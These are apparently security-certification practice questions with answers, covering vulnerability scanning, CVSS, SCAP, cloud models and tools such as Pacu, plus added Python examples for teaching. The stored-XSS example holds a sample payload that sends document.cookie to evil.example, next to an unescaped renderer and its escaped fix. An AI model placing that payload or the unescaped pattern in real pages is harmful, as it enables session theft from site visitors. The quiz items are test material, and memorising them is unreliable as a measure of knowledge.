Ch 4 - 6
D. Pacu Pacu is an AWS-specific exploitation framework. It is particularly well suited to identifying the permissions available to an account during a penetration test. ScoutSuite, Inspector, and Prowler are all assessment tools that would not directly provide the information that Gina seeks.
Gina gained access to a client's AWS account during a penetration test. She would like to determine what level of access she has to the account. Which one of the following tools would best meet her need? A. ScoutSuite B. Inspector C. Prowler D. Pacu
D. Cross-site scripting In a cross-site scripting (XSS) attack, an attacker embeds scripting commands in a web page that are later executed by the browser of an unsuspecting visitor. Because the payload here was saved in a forum post and served to every user who views it, this is the stored (persistent) form of XSS. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party.
Monica discovers that an attacker posted a message in a web forum that she manages that is attacking users who visit the site. Which one of the following attack types is most likely to have occurred? A. SQL injection B. Malware injection C. LDAP injection D. Cross-site scripting
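The stored XSS described in the Monica question, as an added example that is not part of the original quiz: a forum renderer that concatenates user-supplied post text straight into HTML, beside the hardened version that escapes every user-controlled value for an HTML text context. The posts, the author names and the payload are constructed sample data.

```python
import html
import re

# Constructed sample forum posts (example data, not from the original page).
# "mallory" is the attacker; the payload exfiltrates the viewer's cookie.
POSTS = [
    {"author": "alice", "body": "Has anyone run the scanner against the staging hosts?"},
    {"author": "mallory",
     "body": '<script>fetch("https://evil.example/c?" + document.cookie)</script>'},
]

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_post_vulnerable(post):
    """Stored XSS: user-controlled text is concatenated straight into the HTML."""
    return f'<div class="post"><b>{post["author"]}</b>: {post["body"]}</div>'


def render_post_safe(post):
    """Hardened: every user-controlled value is escaped for an HTML text context.

    html.escape(quote=True) turns < > & " ' into entities, so the browser shows
    mallory's payload as text instead of executing it.
    """
    author = html.escape(post["author"], quote=True)
    body = html.escape(post["body"], quote=True)
    return f'<div class="post"><b>{author}</b>: {body}</div>'


def render_thread(posts, renderer):
    """Build the thread page from the posts using the given per-post renderer."""
    return "\n".join(renderer(post) for post in posts)


def contains_active_script(page):
    """Crude check used only to show the difference: does a raw <script tag survive?"""
    return SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_post_vulnerable), ("safe", render_post_safe)):
        page = render_thread(POSTS, renderer)
        print(f"{name}: script tag present = {contains_active_script(page)}")
        print(page, end="\n\n")
```

Escaping is context-specific: the HTML-entity encoding shown here is correct for text between tags, but a value placed inside an attribute, a URL, or a JavaScript block needs the encoder for that context. In practice this belongs in a templating engine with auto-escaping enabled, with a Content Security Policy that forbids inline scripts as a second layer.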
D. Read-only Credentialed scans only require read-only access to target servers. Renee should follow the principle of least privilege and limit the access available to the scanner.
Renee is configuring her vulnerability management solution to perform credentialed scans of servers on her network. What type of account should she provide to the scanner? A. Domain administrator B. Local administrator C. Root D. Read-only
A. Continuous monitoring Continuous monitoring incorporates data from agent-based approaches to vulnerability detection and reports security-related configuration changes to the vulnerability management platform as soon as they occur, providing the ability to analyze those changes for potential vulnerabilities.
What approach to vulnerability scanning incorporates information from agents running on the target servers? A. Continuous monitoring B. Ongoing scanning C. On-demand scanning D. Alerting
D. 3.1 Of the versions listed, CVSS version 3.1 (published in 2019) is the most recent. Many scanners still report a CVSS version 2.0 score next to the 3.x score, so an analyst should check which version a given score refers to before comparing findings.
What is the most recent version of CVSS that is currently available? A. 1.0 B. 2.0 C. 2.5 D. 3.1
C. High Control enhancement RA-5(4), Discoverable Information, in NIST SP 800-53 requires that an organization determine what information about the system is discoverable by adversaries. This enhancement is assigned only to the FISMA high baseline.
What minimum level of impact must a system have under FISMA before the organization is required to determine what information about the system is discoverable by adversaries? A. Low B. Moderate C. High D. Severe
D. Hybrid cloud Hybrid cloud environments blend elements of public, private, and/or community cloud solutions. A hybrid cloud requires the use of technology that unifies the different cloud offerings into a single, coherent platform.
Which cloud computing deployment model requires the use of a unifying technology platform to tie together components from different providers? A. Public cloud B. Private cloud C. Community cloud D. Hybrid cloud
C. PR The privileges required (PR) metric indicates the type of account access the attacker must have.
Which one of the CVSS metrics would contain information about the type of account access that an attacker must have to execute an attack? A. AV B. C C. PR D. AC
C. Reporting Although reporting and communication are an important part of vulnerability management, they are not included in the life cycle. The three life-cycle phases are detection, remediation, and testing.
Which one of the following activities is not part of the vulnerability management life cycle? A. Detection B. Remediation C. Reporting D. Testing
B. Snort Qualys, Nessus, and OpenVAS are all examples of vulnerability scanning tools. Snort is a network intrusion detection and prevention system.
Which one of the following is not an example of a vulnerability scanning tool? A. Qualys B. Snort C. Nessus D. OpenVAS
C. Using a cloud provider's web interface to provision resources Infrastructure as code is any approach that automates the provisioning, management, and deprovisioning of cloud resources. Defining resources through JSON or YAML is IaC, as is writing code that interacts with an API. Provisioning resources through a web interface is manual, not automated, and therefore does not qualify as IaC.
Which one of the following is not an example of infrastructure as code? A. Defining infrastructure in JSON B. Writing code to interact with a cloud provider's API C. Using a cloud provider's web interface to provision resources D. Defining infrastructure in YAML
B. DeepLens AWS Lambda, Google Cloud Functions, and Microsoft Azure Functions are all examples of function as a service (FaaS) computing. AWS DeepLens is an AI-enabled camera.
Which one of the following services is not an example of FaaS computing? A. Lambda B. DeepLens C. Google Cloud Functions D. Azure Functions
C. Inline CASB solutions can monitor activity but cannot actively enforce policy. Inline CASB solutions require either network reconfiguration or the use of a software agent. They intercept requests from users to cloud providers and, by doing so, are able to both monitor activity and enforce policy.
Which one of the following statements about inline CASB is incorrect? A. Inline CASB solutions often use software agents on endpoints. B. Inline CASB solutions intercept requests from users to cloud providers. C. Inline CASB solutions can monitor activity but cannot actively enforce policy. D. Inline CASB solutions may require network reconfiguration.
B. IDS Intrusion detection systems (IDSs) are a security control used to detect network or host attacks. The Internet of Things (IoT), supervisory control and data acquisition (SCADA) systems, and industrial control systems (ICSs) are all associated with connecting physical world objects to a network.
Which one of the following terms is not typically used to describe the connection of physical devices to a network? A. IoT B. IDS C. ICS D. SCADA
C. Low An attack complexity of "low" indicates that exploiting the vulnerability does not require any specialized conditions.
Which one of the following values for the CVSS attack complexity metric would indicate that the specified attack is simplest to exploit? A. High B. Medium C. Low D. Severe
B. ScoutSuite ScoutSuite is the only cloud assessment tool listed here that performs security configuration scans of Azure environments (it also covers AWS and GCP). Inspector is an AWS-native service, and Prowler was an AWS-only tool when this question was written, although recent Prowler releases have added Azure and GCP support. Pacu is an exploitation framework used in penetration testing, not a configuration scanner.
Amanda would like to run a security configuration scan of her Microsoft Azure cloud environment. Which one of the following tools would be most appropriate for her needs? A. Inspector B. ScoutSuite C. Prowler D. Pacu
B. Moderate impact Systems have a moderate impact from a confidentiality perspective if the unauthorized disclosure of information could be expected to have a serious adverse effect on organizational operations, organizational assets, or individuals.
Brian is seeking to determine the appropriate impact categorization for a federal information system as he plans the vulnerability scanning controls for that system. After consulting management, he discovers that the system contains information that, if disclosed improperly, would have a serious adverse impact on the organization. How should this system be categorized? A. Low impact B. Moderate impact C. High impact D. Severe impact
A. VM escape VM escape vulnerabilities are the most serious issue that can exist in a virtualized environment, particularly when one physical host runs guests of differing security levels. In an escape attack, an attacker with access to a single guest VM breaks out of that guest's isolation into the hypervisor or host, and from there reaches resources assigned to other virtual machines on the same host.
In what type of attack does the attacker seek to gain access to resources assigned to a different virtual machine? A. VM escape B. Management interface brute force C. LDAP injection D. DNS amplification
C. CPE Common Platform Enumeration (CPE) is an SCAP component that provides standardized nomenclature for product names and versions.
Jason is writing a report about a potential security vulnerability in a software product and wishes to use standardized product names to ensure that other security analysts understand the report. Which SCAP component can Jason turn to for assistance? A. CVSS B. CVE C. CPE D. OVAL
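An added example, not part of the original quiz, of what the standardized CPE naming looks like in practice: a parser for the CPE 2.3 formatted string (the `cpe:2.3:part:vendor:product:version:...` form used in NVD data), handling the backslash quoting that lets a value contain a literal colon, plus a simplified matcher. The CPE strings used as input are illustrative, and `cpe_matches` implements only the `*` (ANY) rule, not the full CPE name matching specification.

```python
import re

CPE_FIELDS = ("part", "vendor", "product", "version", "update", "edition",
              "language", "sw_edition", "target_sw", "target_hw", "other")
PART_NAMES = {"a": "application", "o": "operating system", "h": "hardware"}


def split_unescaped(text, sep=":"):
    """Split on separators not preceded by a backslash (CPE 2.3 writes ':' inside a value as '\\:')."""
    fields, current, escaped = [], [], False
    for ch in text:
        if escaped:
            current.append(ch)
            escaped = False
        elif ch == "\\":
            current.append(ch)
            escaped = True
        elif ch == sep:
            fields.append("".join(current))
            current = []
        else:
            current.append(ch)
    fields.append("".join(current))
    return fields


def unescape(component):
    """Drop the backslash quoting used in formatted strings ('\\:' becomes ':')."""
    return re.sub(r"\\(.)", r"\1", component)


def parse_cpe23(cpe):
    """Parse a CPE 2.3 formatted string into its eleven named components."""
    parts = split_unescaped(cpe)
    # 'cpe' + '2.3' + eleven components; the older 'cpe:/a:...' URI form is rejected here
    if len(parts) != 13 or parts[0] != "cpe" or parts[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe!r}")
    fields = dict(zip(CPE_FIELDS, (unescape(p) for p in parts[2:])))
    if fields["part"] not in PART_NAMES:
        raise ValueError(f"unknown part {fields['part']!r}")
    return fields


def is_cpe23(cpe):
    """True if the string parses as a CPE 2.3 formatted string."""
    try:
        parse_cpe23(cpe)
        return True
    except ValueError:
        return False


def cpe_matches(pattern, target):
    """Simplified CPE name matching (an assumption of this example): '*' (ANY) on either
    side matches anything; otherwise components must be equal ignoring case. The full
    specification also defines '-' (NA) and in-value wildcards, which are not handled here."""
    p, t = parse_cpe23(pattern), parse_cpe23(target)
    return all(p[f] == "*" or t[f] == "*" or p[f].lower() == t[f].lower() for f in CPE_FIELDS)


def describe(cpe):
    """Human-readable rendering of the fields an analyst most often needs in a report."""
    f = parse_cpe23(cpe)
    return f"{PART_NAMES[f['part']]} {f['vendor']} {f['product']} version {f['version']}"


if __name__ == "__main__":
    # Illustrative CPE names (constructed for this example)
    advisory = "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*"
    asset = "cpe:2.3:a:apache:log4j:2.14.1:*:*:*:*:*:*:*"
    print(describe(asset))
    print("asset affected by advisory:", cpe_matches(advisory, asset))
```

Using the parsed `vendor`/`product`/`version` fields rather than free-text names is what lets a report be matched automatically against an asset inventory or an advisory feed; a version-level `*` in the advisory pattern is how "all versions of this product" is expressed.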
A. CVSS The Common Vulnerability Scoring System (CVSS) provides a standardized approach for measuring and describing the severity of security vulnerabilities. Jessica could use this scoring system to prioritize issues raised by different source systems.
Jessica is reading reports from vulnerability scans run by different parts of her organization using different products. She is responsible for assigning remediation resources and is having difficulty prioritizing issues from different sources. What SCAP component can help Jessica with this task? A. CVSS B. CVE C. CPE D. XCCDF
B. NAT Although the network can support any of these protocols, internal IP disclosure vulnerabilities occur when a network uses Network Address Translation (NAT) to map public and private IP addresses but a server inadvertently discloses its private IP address to remote systems.
Tom is reviewing a vulnerability scan report and finds that one of the servers on his network suffers from an internal IP address disclosure vulnerability. What technology is likely in use on this network that resulted in this vulnerability? A. TLS B. NAT C. SSH D. VPN
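An added example, not part of the original quiz, of the check a scanner performs for Tom's finding: scan an HTTP response for RFC 1918 addresses leaking out through headers (classically the `Location` header of a redirect from a server behind NAT that does not know its public name) or through the body. The response below is constructed sample data; the private ranges are listed explicitly rather than using Python's `is_private`, which also matches loopback, link-local and documentation ranges.

```python
import ipaddress
import re

# RFC 1918 private ranges, listed explicitly so that only NAT-internal addresses are flagged.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Dotted quads as whole tokens: a longer run such as 1.2.3.4.5 is not carved into an address.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# Constructed HTTP response (example data, not from the page): a server behind NAT
# redirects to its own private address and leaks a second one in an error message.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache/2.4.41\r\n"
    "Location: http://10.0.3.17/app/login\r\n"
    "Via: 1.1 198.51.100.7\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>Upstream 172.16.8.40 unavailable; failover 172.32.0.1 ok</body></html>"
)


def is_rfc1918(text):
    """True if the dotted quad is a valid IPv4 address inside an RFC 1918 range."""
    try:
        addr = ipaddress.IPv4Address(text)
    except ValueError:            # e.g. 300.1.1.1 matches the regex but is not an address
        return False
    return any(addr in net for net in RFC1918)


def find_internal_ips(raw_response):
    """Return (where, address) pairs for every RFC 1918 address in headers or body."""
    head, _, body = raw_response.partition("\r\n\r\n")
    findings = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        findings += [("header:" + name.strip(), ip)
                     for ip in IPV4_RE.findall(value) if is_rfc1918(ip)]
    findings += [("body", ip) for ip in IPV4_RE.findall(body) if is_rfc1918(ip)]
    return findings


if __name__ == "__main__":
    for where, ip in find_internal_ips(SAMPLE_RESPONSE):
        print(f"internal IP disclosure: {ip} in {where}")
```

The NAT mapping itself is not the flaw; the server is building self-referential URLs or error text from its own interface address. The usual fix is to configure the server's canonical public hostname so redirects and error pages never embed the private address, and to check that reverse proxies in front of it strip or rewrite such headers.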
D. Quarterly PCI DSS requires that organizations conduct vulnerability scans on at least a quarterly basis, although many organizations choose to conduct scans on a much more frequent basis.
Tonya is configuring vulnerability scans for a system that is subject to the PCI DSS compliance standard. What is the minimum frequency with which she must conduct scans? A. Daily B. Weekly C. Monthly D. Quarterly
D. Data In the shared responsibility model, the customer always retains either full or partial responsibility for data security. Responsibility for hardware and physical datacenters is the cloud provider's responsibility under all models. Responsibility for applications is the customer's responsibility under IaaS, the provider's responsibility under SaaS, and a shared responsibility under PaaS.
Under the shared responsibility model, which component always remains the responsibility of the customer, regardless of the cloud service model used? A. Application B. Hardware C. Datacenter D. Data
C. Government agency The Federal Information Security Management Act (FISMA) requires that government agencies conduct vulnerability scans. HIPAA, which governs hospitals and doctors' offices, does not include a vulnerability scanning requirement, nor does GLBA, which covers financial institutions. Banks may be required to conduct scans under PCI DSS, but this is a contractual obligation and not a statutory requirement.
Which type of organization is the most likely to face a statutory requirement to conduct vulnerability scans? A. Bank B. Hospital C. Government agency D. Doctor's office